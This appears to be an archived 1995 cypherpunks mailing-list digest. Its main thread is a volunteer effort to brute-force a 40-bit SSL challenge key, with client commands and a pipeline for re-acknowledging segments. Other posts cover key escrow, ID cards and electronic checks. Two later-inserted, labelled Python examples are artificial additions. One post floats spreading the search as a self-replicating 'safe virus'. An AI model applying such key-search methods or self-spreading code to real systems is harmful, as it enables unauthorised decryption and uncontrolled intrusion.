We bolted it all together, and it seemed kind of OK.
The plan was then to pass it round a wider audience to check that it ported to 
other systems and environments, and once it was shown to basically work, see 
how it stood up to heavy usage. Finally we could let it rip & see what it 
could do.
Unfortunately, due to various external pressures, we have ended up rolling all 
these three into one. It has made it a lot messier than I would have hoped, 
for which I apologise to you all.

rc4-40 had shown that 40bit address spaces could be scanned.
hal1 slipped through our fingers, and showed somewhat more than we had 
planned, i.e. that actual code could be broken by a *single* person (this 
sounds more impressive, but is technically easier !).
We asked for hal2 and hal3 to "check it works" and "watch it zip" respectively.
Before he left, Hal gave us hal2, so we combined the two remaining stages.

SO: this project is:
    1) to shake down the code on different systems
    2) to see how it works under real load
    3) to see how quickly a 40bit address space can be scanned.

Again I apologise to you all that (1) has been non-trivial and that (2) has 
had unpleasant effects of (1). I think next time we may be ready for (3) ...

I was going to summarise some of the lessons so far, but things are getting 
congested again, so I shall send out this PLEA to ensure recent code is used !!

current requirements
====================

PLEASE ensure that you are using a brclient of at least 0.14
("grep comment.inffo brclient" to discover what you are using)
You can update brclient while brloop is running.
Some people are still running old versions, and this is hammering the server.

It also helps to run at least brloop 0.05 ("grep BRLOOPCOMMENT brloop").

What to do if you have logs
===========================

During the early part of the project, the server was highly congested, and I 
fear that many ACKs may have been lost :-(

If you have logs of the searches your machine(s) did, it would be useful to 
check  that all ACKs got through.

Look at the stats page http://www.brute.cl.cam.ac.uk/cgi-bin/brute?op=stats
(or something like
http://www.brute.cl.cam.ac.uk/cgi-bin/brute?op=stats&project=&proj=2977+Hal%27s+second+challenge&substring=YourID&patt=unacknowledged
but with YourID replaced by the ID you use)
and look for all the NOACKs. e.g:
	008f      NOACK 008f   1 Piete Brooks <pb@cl.cam.ac.uk>
See if there is a corresponding entry in your logs
	grep -h '2977 [0-9a-f]* 008f [0-9]* [n0-9a-f][o0-9a-f]'
and if so, ACK it
	brclient -Ltssl -a'2977 2a07 008f 1 no'

[ If you're a HACKer, you can automate it, as in

	lynx -dump 'http://www.brute.cl.cam.ac.uk/cgi-bin/brute?op=stats&project=&proj=2977+Hal%27s+second+challenge&substring=Piete.Brooks&patt=unacknowledged' |
	grep ' NOACK ' | while read a b; do
	   grep -h '2977 [0-9a-f]* '"$a"' [0-9]* [n0-9a-f][o0-9a-f]' ~/BR-*;
	   done | while read a; do brclient -Ltssl -a"$a"; done

  or the like ....
]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Fri, 25 Aug 95 12:19:29 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <9508251723.AA18139@cantina.verity.com>
Message-ID: <199508251916.MAA26736@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| > those who have logs
| > ===================

    [about manually updating ACKs]

Unfortunately, I don't dare do that, since my machines have crashed
a few times. (nightly reboots for example.)

I guess you dare do it if there is a no-line in the log.

Couldn't you insert some code that measures the time it has taken
that particular IP-number to ACK other blocks, and timeout the
reservation after double that time or something similar? In this case
you don't run the risk of ACKing a block with the key in it.

Some more work for the server! :-)

/Christian
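
Added example (not part of either message, and not the project's code): the NOACK check from Piete's message with the caveat raised in this reply built in, so a segment is re-ACKed only when the local log holds a completed result line for it. The log-line layout is inferred from the grep pattern in the message; the sample stats rows and log lines are constructed, and the function names are hypothetical.

```python
import re

# One completed search in a client log, in the shape the grep pattern in the
# message implies: project, a hex field the page does not name, start segment,
# segment count, then the result ("no" or a hex value).
LOG_LINE = re.compile(
    r"^(?P<project>\d+) (?P<tag>[0-9a-f]+) (?P<start>[0-9a-f]+) "
    r"(?P<count>\d+) (?P<result>no|[0-9a-f]{2,})$"
)

# Constructed sample of a text dump of the stats page (row shape taken from
# the one NOACK row quoted in the message).
SAMPLE_STATS = """\
Unacknowledged segments for project 2977
\t008f      NOACK 008f   1 Example User <user@example.org>
\t0190      NOACK 0190   1 Example User <user@example.org>
\t0191      NOACK 0191   1 Example User <user@example.org>
"""

# Constructed sample client log. 008f was logged twice, 0191 was cut short
# (as after a crash or reboot), 0190 never reached the log, and 0192 is
# complete but is not listed as NOACK.
SAMPLE_LOG = """\
2977 2a07 008f 1 no
2977 2a07 008f 1 no
2977 2a07 0191 1
2977 3b11 0192 1 no
"""


def noack_segments(stats_text):
    """Return the start segment of every NOACK row, in page order."""
    starts = []
    for line in stats_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == "NOACK" and fields[0] not in starts:
            starts.append(fields[0])
    return starts


def completed_searches(log_text, project):
    """Map start segment -> distinct, fully written result lines."""
    done = {}
    for line in log_text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m is None or m["project"] != project:
            continue  # truncated or foreign line: not proof of a finished search
        lines = done.setdefault(m["start"], [])
        if m.group(0) not in lines:
            lines.append(m.group(0))
    return done


def reconcile(stats_text, log_text, project="2977"):
    """Return (lines safe to re-ACK, NOACK segments with no finished result)."""
    done = completed_searches(log_text, project)
    acks, unconfirmed = [], []
    for start in noack_segments(stats_text):
        if start in done:
            acks.extend(done[start])
        else:
            unconfirmed.append(start)
    return acks, unconfirmed


def ack_commands(acks):
    """Render the brclient invocation shown in the message, one per line."""
    return ["brclient -Ltssl -a'%s'" % a for a in acks]


if __name__ == "__main__":
    acks, unconfirmed = reconcile(SAMPLE_STATS, SAMPLE_LOG)
    for cmd in ack_commands(acks):
        print(cmd)  # printed for review, not executed
    print("no completed result logged for:", " ".join(unconfirmed))
```

Segments in the second list are left for the server to hand out again rather than ACKed on trust.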





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 05:04:35 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: improving the distributed computation
In-Reply-To: <9508251143.AA15702@all.net>
Message-ID: <"swan.cl.cam.:252910:950825120349"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 1) Abandon the central command way of doing things.  Little if any
> communication is required for this computation, it should be
> self-distributing to and between volunteer sites.  That makes it ideal
> for implementation as a safe virus. 

I need some hints as to what the above means, but combined with (3) it becomes 
trivial ...

> 2) Give these computations a defined and limited lifetime.  The problem
> you have with old versions is because they don't die automatically or
> even check to see if they are up-to-date and update themselves.

You want self updating code running on *your* system ???

What do you mean by "safe virus" ??

> 3) Use randomness to break up the search space and redundantly perform
> the computation.  This should eliminate the problems with malicious
> key-space requests, etc.

If you take this step, you can chuck SKSP altogether.
All that is needed is some way to tell the virus to stop when the answer has 
been found -- or would you not bother with that ?

If random searching were permitted, that would indeed be the way to go.

> 4) Use feedback in the form of selective survival/replication to
> optimize the search and allocate search space.  If a processor goes
> quickly, give it more to do - if it goes slowly, give it less.

I'm lost -- if the search is random, you just let it run !

> This will produce an overall system that adapts with time to the changes in
> network and system usage so as to optimize overall performance as a
> function of time.

Eh ?

With random searching you just run it on all machines you can !
No adaptation, just brute CPU cycles ....


Have I missed something ??
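
Added example (not from the thread or from the brute project): a small simulation of what point 3 trades away, comparing a server that hands each chunk out exactly once with clients that pick chunks at random and keep no record. The chunk count, trial count, seed and function names are assumptions chosen for the illustration.

```python
import random


def coordinated_work(n_chunks, key_chunk, rng):
    """Chunks searched when a server hands out 0, 1, 2, ... exactly once."""
    return key_chunk + 1


def random_work(n_chunks, key_chunk, rng):
    """Chunks searched when every request picks a chunk uniformly at random,
    with no record of what has already been covered."""
    searched = 0
    while True:
        searched += 1
        if rng.randrange(n_chunks) == key_chunk:
            return searched


def mean_work(strategy, n_chunks=256, trials=2000, seed=1995):
    """Average chunks searched before the chunk holding the key is hit."""
    rng = random.Random(seed)
    total = 0
    for _ in range(trials):
        key_chunk = rng.randrange(n_chunks)  # key equally likely anywhere
        total += strategy(n_chunks, key_chunk, rng)
    return total / trials


def coverage_after(n_chunks, draws):
    """Expected fraction of distinct chunks touched after `draws` random picks."""
    return 1.0 - (1.0 - 1.0 / n_chunks) ** draws


if __name__ == "__main__":
    n = 256
    print("coordinated: %.1f chunks (closed form %.1f)"
          % (mean_work(coordinated_work, n), (n + 1) / 2))
    print("random:      %.1f chunks (closed form %.1f)"
          % (mean_work(random_work, n), float(n)))
    print("space covered after %d random picks: %.1f%%"
          % (n, 100 * coverage_after(n, n)))
```

Random picking removes the allocation server but costs about twice the expected work, and after as many picks as there are chunks roughly 37% of the space is still untouched.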




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 25 Aug 95 10:15:45 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
Message-ID: <199508251710.NAA26505@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

[Welcome back, Professor] You posted:


>Will, starting next year, containg a digitized photo, plus the current 
>info.

<snip>

>Anyone know any details about the technololgy?

<snip>

Not really.
        I saw the same story. The name, address, age, & height mentioned
are already obvious on licenses, but this may preclude incorrect data entry
by FL cops, and counterfeiting (a problem here for *years*). I saw nothing
on the digitized photo, but we could be looking at different stories.
Phase-in in July, '96. The story I saw suggests that other data, such as
tickets, criminal violations (presumably convictions) and "other
biographical information" [welfare, credit info] could eventually be
included, depending on FL's state budgetary considerations. No author,
just "Associated Press," listed on the story, and the card uses a magnetic
strip "like those on credit cards" rather than a chip, which may be a
mistake [considering the renewal period & my experience with bank-cards].
Story doesn't say it, but it sounds like FL *may* be the first state to do
this. Are any other states doing this already?
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMD4DiW1lp8bpvW01AQGF+QP/RG9aTxVeujNDL2ebdyNL558PrtXclUhf
9iLETvzNu/OtplKZXng67SkBkECpbh5LyOpoeRkhhWUANJhcIUhJKhcaUIOmLR2n
KLjQ6WnGx5OHXPr53htVrvyg4L6Y0tX5233AEk8iDxxBh79alHmxuklT7s13CPgI
k9HklCZ77kg=
=teIz
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"Those who deny freedom to others deserve it not for themselves, and,
under a just God, cannot long retain it." -- Abraham Lincoln,
in a letter to H.L. Pierce, 6-Apr.-1859
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  liberty@gate.net
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMD4D+SoZzwIn1bdtAQGy+gGAq40gk8nqgdvnSrp6QBQ3jcW5f8kI0wux
IoWUKN8tHUaOHuP+s4ImuW6j++Mhht1b
=zXwD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 25 Aug 95 10:20:32 PDT
To: cypherpunks@toad.com
Subject: Search This Space Please
Message-ID: <199508251720.NAA08690@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


When one leaves one's machine running all night with the screen turned off,
one should be careful to turn the screen on *before* hitting the power
switch.  Since hitting an on button switch will turn it off before you
collect the search results.

I have tried to REJECT this range but haven't been able to figure out the
syntax the server expects.  I am without fast machines for the weekend.

Here it is:

**************************************

brutessl ssl.pf 2977 0198   20
assuming the config info is in ssl.pf

so go do it !

**************************************

Thanks,
 
DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@mail.msen.com>
Date: Fri, 25 Aug 95 10:31:13 PDT
To: cypherpunks@toad.com
Subject: for perl experts: brclient problem
Message-ID: <Pine.BSD/.3.91.950825132719.4736B-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


I sent this originally only to Piete, but as I suspect he is already 
somewhat busy, I am now also forwarding a copy to the list.

I just upgraded to brclient version 0.16.
I tried to use it with this command:
brclient -Ltssl -a'2977 6284 390a 3 no'
I got this result:
Use of uninitialized variable at ./brclient line 457, <COMMAND> line 1.
Failed: 0 <No DATA>

I am totally perl.clueless, so I merely refer this to you.

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler  <lwp@mail.msen.com> ::   No animals were harmed in the
::      http://www.msen.com/~lwp/   ::   production of this message.
::::::::::::::::::::::::::::::::::::::





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Fri, 25 Aug 95 13:36:10 PDT
To: cypherpunks@toad.com
Subject: Approved Escrow Agents (forget GAK Motel)
Message-ID: <199508252035.NAA05527@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


Here are some discussion papers for the upcoming NIST-sponsored conference
on 6-7 Sep 95 in DC.  Note the footnote in the 2nd paper:

    (*1)  "Approved," for the purposes of this discussion, means that
    the government (or its agent) has formally granted permission for
    an organization to hold keys for exportable encryption products.

I'd been working on some GAK slogans based on Roach Motel... into the
dumpster with "Keys go in, but they never come out!" -- too bad.

	Jim "GAK Motel" Gillogly
	Sterday, 3 Halimath S.R. 1995, 20:32
___________________________________________________________________________

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


                      Issues -- Export of 
                 Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents.  Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).  

We are working toward creating broadly stated criteria that are
in the nature of performance specifications.  To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.  

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied.  This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products.  There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria.  These questions are:  

*    Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm? 

*    Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?

*    Access to escrow information -- What mechanisms must be
     designed into encryption products to allow authorized access
     to escrowed keys?  This likely includes the identity of the
     key escrow agent(s) and a serial number for the key escrow
     agent to use to identify the key(s)/component(s) necessary
     to decrypt the message.  What other information will be
     necessary to be provided to the escrow agent to identify the
     necessary key(s)/component(s)?  Are there other comparable
     viable approaches?

*    Non-escrowed use -- How can products be made so that they do
     not function with non-escrowed products (or tampered
     escrowed products)?  How can this be tested?

*    Limiting surveillance -- How can products be designed so
     that information both sent and received by the user can be
     decrypted without release of keys of other users?

*    Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?

*    Assurance that keys are escrowed -- How can it be assured
     that key escrow products are indeed satisfactorily escrowed? 
     For example, products could be required to be escrowed at
     time of manufacture or be made inoperable until properly
     escrowed.

*    Ability to re-escrow keys -- How can products be designed so
     that new keys can be escrowed at the user's discretion with
     a U.S. Government approved escrow agent?

*    Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent? 

                         --------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses.  The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.  


Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

                  -----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


                      Discussion Issues:  
         Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1)  Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined.  Some of the issues which need to be discussed and
resolved include the following:

*    What kinds of organizations should be excluded from
     consideration as approved key escrow agents? 

*    What sort of legal agreement between the government and the
     key escrow agent is necessary to stipulate the
     responsibilities of the agent?  Should this include the
     terms and conditions under which release of a key is
     required?  

*    How will liability for unauthorized release of key be
     handled?

*    Should, for example, intentionally misreleasing or
     destroying a key be criminalized?  Should this include other
     actions?                           

*    How can the government's needs for confidentiality of key
     release be handled?

*    Should approval of key escrow agents be tied to a public key
     infrastructure (for digital signatures and other purposes)? 

*    What procedures need to be developed for the storage and
     safeguarding of keys?

*    What are the acceptable performance criteria (e.g., around-
     the-clock availability, accessibility, reliability, etc.)
     for approved key escrow agents?

*    Under what circumstances will key escrow agents in foreign
     countries be approved?

*    What process will be used to approve escrow agents? 
     Costs/who pays?
---------
(*1)  "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.

Note:  These issues will be discussed at the Key Escrow Issues Meeting
to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National
Institute of Standards and Technology (Gaithersburg, Maryland).  The
meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail: carlton@micf.nist.gov.

8/25/95
___________________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 25 Aug 95 10:43:13 PDT
To: cme@TIS.COM
Subject: Re: A 12 Crime w/in & Crime w/out--Ehlers Remark From Carl Ellison
Message-ID: <9508251739.AA17852@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


http://aspen.pff.org/forums/read-message.cgi/forum4?number=n0058010101&by=Date&start=0

> Re: A 12 Crime w/in & Crime w/out--Ehlers Remark
> 
> Carl Ellison (cme@tis.com)
> Fri Aug 25 17:35:42 1995 (GMT)
> 
> -------------------------------------------------------------------------------
> As I believe Congressman Ehlers pointed out, there is crime in cyberspace and
> it is likely to remain a threat forever.
> 
> I refer here to incidents like the Russian hacker's theft of $400,000.
> 
> I do not refer to the use of cyberspace to violate some local ordinance in the
> physical world (the prosecution of the California AA BBS based on the local
> standards in some Eastern state (Tenn?)).
> 
> My company is in the business of protecting people from attacks within
> cyberspace and I believe, personally, that as long as cryptographic policy is
> made rational, we citizens and businesses can mount an effective defense
> against these threats. This is not an issue of using deadly force in defense.
> Because we don't threaten the attacker in return, there is no need for a
> specially empowered force (a police force) controlled by an elected government
> to achieve this protection. This is an issue of building good walls and doors
> -- a strictly defensive action which is appropriate for individuals and
> companies to do without government involvement.
> 
> -------------------------------------------------------------------------------

-- 
Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme/home.html
Trusted Information Systems, Inc.   http://www.tis.com/
3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2
Glenwood MD  21738            Tel:(301)854-6889      FAX:(301)854-5363






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 25 Aug 95 11:49:46 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: Florida Drivers Permits
Message-ID: <199508251855.NAA14828@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 PM 8/25/95 -0400, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>- -----BEGIN PGP SIGNED MESSAGE-----
>
>[Welcome back, Professor] You posted:
>
>
>>Will, starting next year, containg a digitized photo, plus the current 
>>info.
>
><snip>
>
>>Anyone know any details about the technololgy?
>
><snip>
>
>Not really.
>        I saw the same story. The name, address, age, & height mentioned
>are already obvious on licenses, but this may preclude incorrect data entry
>by FL cops, and counterfeiting (a problem here for *years*). I saw nothing
>on the digitized photo, but we could be looking at different stories.
>Phase-in in July, '96. The story I saw suggests that other data, such as
>tickets, criminal violations (presumably convictions) and "other
>biographical information" [welfare, credit info] could eventually be
>included, depending on FL's state budgetary considerations. No author,
>just "Associated Press," listed on the story, and the card uses a magnetic
>strip "like those on credit cards" rather than a chip, which may be a
>mistake [considering the renewal period & my experience with bank-cards].
>Story doesn't say it, but it sounds like FL *may* be the first state to do
>this. Are any other states doing this already?

Texas is now issuing similar cards - with the addition of a barcode on the
back. Front is going to have UV-reactive writing, and be color-coded for
class of license (commercial, chauffeur, etc).

Happily, I renewed just a couple months ago, so have plenty of time to
figure out what I can do to the new DL when I get one :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 25 Aug 95 11:53:20 PDT
To: cypherpunks@toad.com
Subject: brutessl web keyservice
Message-ID: <199508251859.NAA14905@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Feh.

I've been trying to get allocated some more keyspace from the brutessl web
page, and keep getting timeouts.

Last time, I requested 8 segments, got issued *3*.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 25 Aug 95 11:13:45 PDT
To: cypherpunks@toad.com
Subject: NIST Key Escrow Issues Meeting
Message-ID: <9508251808.AA21373@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know if it's been posted, but I have in my hands a statement
that these meetings will be open to the public.

"The meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail: carlton@micf.nist.gov "

 - Carl

P.S.  Anyone going to CRYPTO95?  I'll be there starting tomorrow (Sat).




 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 25 Aug 95 12:18:23 PDT
To: cypherpunks@toad.com
Subject: ssl challenge
Message-ID: <199508251929.OAA15415@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It would be Really Nice if the next version of the brutessl software had a
couple of features (particularly for us folks with mini-LANs) -

        > option to output results to a file (or files, so we can maintain
local logging of results: ie, CHAL2a.dat, CHAL2b.dat, etc).
        > a Windows 3.1 variant (or even win32s)

I've got 3 machines (386sx-33, 386DX-20, 486DX2-80), with an option on my
roommate's machine (386DX-40), all connected via Windows for Workgroups. All
4 are set up with win32s, so could do a *lot* better at keysearches if the
software was available. There's plenty of support for Unix variants, and
even NT/95, but us humble Win/DOS users are kinda left hanging a bit.

Maybe next challenge, we can pre-allocate keyspace based on the results of
this one: look at how fast folks are reporting results, and allocate chunks
of space accordingly (maybe based on an 8-hour 'cycle'). Sure take some of
the load off the poor server :-)

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMD4E48VrTvyYOzAZAQGSMwP8DWxgb5NVDgvIFuw1BGf0E5TP0swHdyZ1
I4gfIGMtjd1AbtJHbxwILSPwb8+BcqZxZtGQXnYRnyoAkK7FltsiGulWApMXmNUU
gtSUMr9xngW+Mwq5ju865Ff5wp7s8Bv3BBTqKGLmXWON1ILbEbjUNwqs4i8+wQU0
PCOgvJndj5M=
=dyvQ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Fri, 25 Aug 95 11:25:59 PDT
To: cypherpunks@toad.com
Subject: Forwarded: FSTC Electronic Check Project News Release
Message-ID: <9508251825.AA08000@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



MAJOR BANKING-COMPUTER CONSORTIUM
TO DEVELOP ELECTRONIC CHECK
FSTC Promises Early Demonstration Using the Internet

Media contacts: Mayer Resnick (201) 836-2968, FSTC, Ed Russell (617)
434-6883, Bank of Boston, FSTC URL: http://www.llnl.gov/fstc

New York (Aug. XX, 1995) -- The Financial Services Technology Consortium
(FSTC) today announced the formation of a multi-industry team to design and
implement an electronic check for use over the Internet by consumers and
businesses.
 FSTC is a consortium whose goal is to utilize emerging technologies to
enhance the competitiveness of the financial services industry.
 The FSTC Electronic Check, which will work within the existing banking
infrastructure, brings the benefits of paper checks to electronic commerce,
while permitting the increased efficiency and timeliness of doing business
on the "net."  FSTC expects to demonstrate the Electronic Check within the
next two months.
 "This project is particularly significant because it represents the first
collaborative effort by major banks and their industry partners to develop
from inception a new financial standard," said Dan Schutzer, FSTC president
and Citibank vice president and director of advanced technology.
 "FSTC's Electronic Check is designed to be open, secure and convenient.
It will bring to electronic commerce on the Internet a level of security
and confidence currently found only in traditional banking products,"
Schutzer added.
 Bank members of the FSTC Electronic Check program are: Bank of America,
Bank of Boston, Bank of Montreal, Bank One, Chemical Bank, Citibank, and
Wells Fargo Bank.  Industry members are: BBN Inc. (Bolt Beranek & Newman),
Equifax, IBM Corporation, Information Resources Engineering Inc., National
Semiconductor, Sun Microsystems and Telequip. Research and consulting
organizations are: Bellcore, Oak Ridge and Sandia National Laboratories,
and the University of Southern California-Information Sciences Institute.
 Advisory members are:  Electronic Check Clearing House Organization
(ECCHO) and National Automated Clearing House Association (NACHA).
 Appointed as the FSTC Electronic Check project director is John Doggett,
director of applied technology, and as project manager is Frank Jaffe,
senior systems consultant, both from Bank of Boston.
 "As shown by the over 60 billion checks written annually, paper checks are
the payment mechanism of choice.  We expect the FSTC Electronic Check and
its smart-card or PC-card checkbook to become the preferred method for
making and receiving payments due to its cost-effectiveness and embedded
safety features," Doggett said.  "The vision of a bank in your pocket, a
bank at your desk, a bank where you are, can now be achieved with the FSTC
electronic check," Doggett added.
 Formed in September 1993, FSTC is a consortium of some 65 organizations
comprising banks, financial services firms, industry partners, national
laboratories, universities, and government agencies.  FSTC sponsors
collaborative research and development on technical projects affecting the
entire financial services industry and its users with particular emphasis
on projects involving electronic commerce.  FSTC development projects
include interbank check image exchange, electronic commerce, and fraud
detection and management.
Editor's note:  Attached is a brief description of how the FSTC Electronic
Check works.

A Brief Description of How FSTC Electronic Check Works

 The FSTC Electronic Check will provide an enhanced all-electronic
replacement to the current paper check, and will be useable over any
network.
 Paper checks and checkbooks will be replaced by electronic checkbooks,
handwritten signatures will be replaced by digital signatures and the
delivery by the postal service by the Internet or other electronic highway.
 These changes will greatly increase the convenience and security of check
writing since the entire process will be automated and integrated into
existing applications.
 By using "smart cards" and PC cards as electronic checkbooks the FSTC
Electronic Check will be almost impossible to forge.  Unlike paper checks,
the person accepting an FSTC Electronic Check for payment will be able to
verify that it has not been altered.
 As with paper checks, electronic checks will be an open payment
instrument, providing for third-party services and a variety of payment
options, such as travelers', cashiers' and certified checks.  FSTC
Electronic Checks also integrate into existing interbank clearing networks
such as the Federal Reserve System and various automated clearing houses.
 FSTC's unique approach to the Electronic Check results in a secure,
self-authenticating payment instrument that bridges the barrier between the
insecure public network and the trusted financial clearing systems.
# # #
For further information on FSTC and how FSTC Electronic Check works,
please contact: Mayer Resnick (201) 836-2968, FSTC, or Ed Russell (617)
434-6883, Bank of Boston.
# # #




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mlm@skyrr.is (Magnus Logi Magnusson)
Date: Fri, 25 Aug 95 07:53:51 PDT
To: trei@process.com
Subject: Re: SSL Challenge: Are we in trouble?
